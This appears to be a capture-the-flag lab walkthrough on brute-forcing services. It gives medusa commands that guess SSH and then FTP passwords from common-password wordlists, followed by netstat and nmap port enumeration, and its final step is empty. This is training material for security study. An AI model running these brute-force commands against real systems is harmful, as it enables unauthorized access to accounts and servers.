LinkedInGitHub

Web Services

What was the password for the ftpuser?

Getting the flag:

Step 1 - Launch the attack with this password wordlist:

  • medusa -h <SERVER_IP> -n <SERVER_PORT> -u sshuser -P 2023-200_most_used_passwords.txt -M ssh -t 3

Step 2 - Login to the server with the password we just found:

  • ssh sshuser@<SERVER-IP> -p SERVER_PORT

Step 3 - Expand the Attack Surface:

  • Execute the netstat command to listen open ports and listen service:

    • netstat -tulpn | grep LISTEN

    • And we found the port 21 open

  • Confirm the port 21 is open with nmap:

    • nmap 127.0.0.1

Step 4 - Targeting the FTP Server:

  • Brute-force the authentication mechanism:

    • medusa -h 127.0.0.1 -u ftpuser -P 2020-200_most_used_passwords.txt -M ftp -t 5

Step 5 - Retrieve the flag:

PreviousLogin FormsNextCustom Wordlists

Last updated